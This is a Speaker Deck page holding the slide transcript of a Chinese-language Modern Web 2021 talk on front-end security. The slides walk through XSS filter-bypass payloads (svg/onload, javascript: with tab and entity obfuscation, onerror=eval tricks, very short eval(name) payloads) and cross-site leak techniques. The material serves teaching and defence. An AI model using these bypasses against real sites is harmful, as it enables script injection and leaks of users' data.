Upgrade to Pro — share decks privately, control downloads, hide ads and more …

接觸資安才發現前端的水真深 - Modern Web 2021

Sponsored · SiteGround - Reliable hosting with speed, security, and support you can count on.
Avatar for Huli Huli
October 15, 2021
Technology
2.6k
0

接觸資安才發現前端的水真深 - Modern Web 2021

接觸資安才發現前端的水真深 - Modern Web 2021

Avatar for Huli

Huli

October 15, 2021

More Decks by Huli

See All by Huli
從冷知識到漏洞,你不懂的 Web,駭客懂 - Huli @ WebConf Taiwan 2025
Avatar for Huli aszx87410
4
3.8k
ModernWeb 2018 - 輕鬆應付複雜的非同步操作:RxJS + Redux Observable
Avatar for Huli aszx87410
0
270
Attacking web without JS - CSS injection
Avatar for Huli aszx87410
0
3.4k
Front-end Security that Front-end developers don't know
Avatar for Huli aszx87410
2
5.9k
你懂了 JavaScript,也不懂 JavaScript - MOPCON 2021
Avatar for Huli aszx87410
3
1.2k
JSDC2020 - 用 API mocking 讓前端不再苦等待
Avatar for Huli aszx87410
0
1.4k

Other Decks in Technology

See All in Technology
ASTのGitHub CopilotとCopilot CLIの現在地をお話しします/How AST Operates GitHub Copilot and Copilot CLI
Avatar for AEON aeonpeople
1
210
20260410 - CNTUG meetup #72 - DiskImage Builder 介紹:以 Kubespray CI 打造 RockyLinux 10 Cloud Image 為例
Avatar for ChengHao Yang tico88612
0
120
システムは「動く」だけでは 足りない - 非機能要件・分散システム・トレードオフの基礎
Avatar for nwiizo nwiizo
25
8k
推し活エージェント
Avatar for ゆんたん yuntan_t
1
900
Autonomous Database - Dedicated 技術詳細 / adb-d_technical_detail_jp
Avatar for oracle4engineer oracle4engineer
PRO
5
13k
終盤で崩壊させないAI駆動開発
Avatar for かとじゅん j5ik2o
0
450
試されDATA SAPPORO [LT]Claude Codeで「ゆっくりデータ分析」
Avatar for Satoru Ishikawa ishikawa_satoru
0
340
今年60歳のおっさんCBになる
Avatar for Hiroo Katoh kentapapa
1
360
NOSTR, réseau social et espace de liberté décentralisé
Avatar for Renaud Lifchitz rlifchitz
0
150
AIエージェントを構築して感じた、AI時代のCDKとの向き合い方
Avatar for Makky12 smt7174
1
150
会社紹介資料 / Sansan Company Profile
Avatar for Sansan, Inc. sansan33
PRO
16
410k
CC Workflow Studio
Avatar for breaking-brake seiyakobayashi
0
270

Featured

See All Featured
Easily Structure & Communicate Ideas using Wireframe
Avatar for Afnizar Nur Ghifari afnizarnur
194
17k
Building an army of robots
Avatar for Kyle Neath kneath
306
46k
Why You Should Never Use an ORM
Avatar for John Nunemaker jnunemaker
PRO
61
9.8k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
Avatar for Morgane Peng morganepeng
133
19k
技術選定の審美眼(2025年版) / Understanding the Spiral of Technologies 2025 edition
Avatar for Takuto Wada twada
PRO
118
110k
Prompt Engineering for Job Search
Avatar for Mfonobong Umondia mfonobong
0
260
Raft: Consensus for Rubyists
Avatar for Patrick Van Stee vanstee
141
7.4k
AI Search: Implications for SEO and How to Move Forward - #ShenzhenSEOConference
Avatar for Aleyda Solis aleyda
1
1.2k
Designing Powerful Visuals for Engaging Learning
Avatar for Mike Taylor tmiket
1
330
What does AI have to do with Human Rights?
Avatar for Per Axbom axbom
PRO
1
2.1k
HU Berlin: Industrial-Strength Natural Language Processing with spaCy and Prodigy
Avatar for Ines Montani inesmontani
PRO
0
310
jQuery: Nuts, Bolts and Bling
Avatar for Doug Neiner dougneiner
66
8.4k

Transcript

  1. 接觸資安才發現前端的⽔水真深 Huli @ Modern Web 2021

  2. About 上半年年:OneDegree 前端⼯工程師

  3. About 上半年年:OneDegree 前端⼯工程師 下半年年:Cymetrics 資安⼯工程師

  4. None

  5. Agenda 1. 繞過各種限制 2. side channel attack 3. 其他你不知道的功能

  6. Agenda 1. 繞過各種限制 2. side channel attack 3. 其他你不知道的功能

  7. XSS

  8. <script> alert(1) </script>

  9. <img src=x onerror=alert(1)>

  10. <svg onload=alert(1)>

  11. Q1 如果把 HTML 中的空格都拿掉 是否還可以⽤用屬性 XSS?

  12. Q1 如果把 HTML 中的空格都拿掉 是否還可以⽤用屬性 XSS?

  13. <svg onload=alert(1)>

  14. <svg/onload=alert(1)>

  15. Q2 如果禁⽌止使⽤用 on 開頭的屬性, 是否還能 XSS?

  16. Q2 如果禁⽌止使⽤用 on 開頭的屬性, 是否還能 XSS?

  17. <iframe/ src="javascript:alert(1)">

  18. Q3 如果把 javascript 開頭的值都濾掉, 是否還能 XSS?

  19. Q3 如果把 javascript 開頭的值都濾掉, 是否還能 XSS?

  20. <iframe/ src="java\tscript:alert(1)">

  21. Q4 如果去除 tab 跟空⾏行行以後去掉 javascript, 是否還能 XSS?

  22. Q4 如果去除 tab 跟空⾏行行以後去掉 javascript, 是否還能 XSS?

  23. <iframe/ src="javascript:alert(1)">

  24. <iframe/ src="&#106avascript:alert (1)">

  25. Q5 如果去除 src 屬性, 是否還能 XSS?

  26. Q5 如果去除 src 屬性, 是否還能 XSS?

  27. <a/ href="javascript:alert(1)">

  28. <script> alert(1) </script>

  29. <script> alert`1` </script>

  30. onerror=alert;throw 1

  31. onerror=eval;throw "=alert\x281\x29"

  32. onerror=eval;throw "=alert\x281\x29" Uncaught 123

  33. onerror=eval;throw "=alert\x281\x29" Uncaught=123

  34. onerror=eval;throw "=alert\x281\x29" Uncaught=alert(1)

  35. None

  36. 字數限制

  37. <svg/onload=> 13 字

  38. 利利⽤用現有資訊

  39. <svg/ onload= eval(`'`+location)> 13 + 18 = 31 字

  40. a.com#';alert(1) `'` + location => 'a.com#';alert(1)

  41. <svg/ onload= eval(`'`+document.URL)> 13 + 22 = 35 字

  42. <svg/ onload= eval(`'`+document.URL)> 13 + 22 = 35 字 9

    個字

  43. <svg/ onload= eval(`'`+URL)> 13 + 13 = 26 字

  44. None
  45. None

  46. Q6 name = 123 typeof name === "number"

  47. Q6 name = 123 typeof name === "number"

  48. example.com window.name

  49. huli.tw window.name

  50. <svg/ onload= eval(name)> 13 + 10 = 23 字

  51. https://tinyxss.terjanq.me/

  52. Agenda 1. 繞過各種限制 2. side channel attack 3. 其他你不知道的功能

  53. Agenda 1. 繞過各種限制 2. Cross site leaks (XS leak) 3.

    其他你不知道的功能

  54. Download 請輸入要搜尋的使⽤用者名稱 example.com/download

  55. Download 請輸入要搜尋的使⽤用者名稱 查無使⽤用者 example example.com/download?q=example

  56. Download 請輸入要搜尋的使⽤用者名稱 a example.com/download?q=a

  57. Download 請輸入要搜尋的使⽤用者名稱 a

  58. 然後呢,我們能做什什麼?

  59. Download 請輸入要搜尋的使⽤用者名稱 iframe example.com/download huli.tw

  60. Download 請輸入要搜尋的使⽤用者名稱 iframe example example.com/download?q=example huli.tw

  61. Download 請輸入要搜尋的使⽤用者名稱 iframe example iframe.contentWindow.origin example.com/download?q=example huli.tw

  62. Download 請輸入要搜尋的使⽤用者名稱 iframe a iframe.contentWindow.origin example.com/download?q=a huli.tw

  63. None

  64. example.com/users/123 David id=message 傳送訊息

  65. example.com/users/210 Peter id=add 加入好友

  66. 然後呢,我們能做什什麼?

  67. example.com/users/123 David id=message 傳送訊息

  68. example.com/users/123#message David id=message 傳送訊息 focus

  69. iframe example.com/users/123#message huli.tw David id=message 傳送訊息

  70. None

  71. Agenda 1. 繞過各種限制 2. side channel attack 3. 其他你不知道的功能

  72. example.com/files example.com/blog 上傳各種檔案 放各種⽂文章

  73. example.com/files example.com/blog path: /files path: /blog 上傳各種檔案 放各種⽂文章

  74. example.com/files example.com/blog path: /files path: /blog 放各種⽂文章 <script>
 alert(1)
 </script>

    files/xss.html

  75. example.com/files example.com/blog path: /files path: /blog 放各種⽂文章 <script>
 alert(1)
 </script>

    files/xss.html ?
  76. None
  77. None

  78. example.com <embed src=/pdf?token=u7Dh3 ……….

  79. example.com <embed src=/pdf?token=u7Dh3 ………. <script>
 alert(1)
 </script>

  80. example.com <embed src=/pdf?token=u7Dh3 ………. <script>
 alert(1)
 </script> ?

  81. None
  82. None

  83. Agenda 1. 繞過各種限制 2. side channel attack 3. 其他你不知道的功能

  84. 資料來來源 1.https://tinyxss.terjanq.me/ 2.https://xsleaks.dev/ 3.LINE CTF 2021 4.DiceCTF 2021 5.zer0pts CTF

    2021

  85. google: cymetrics blog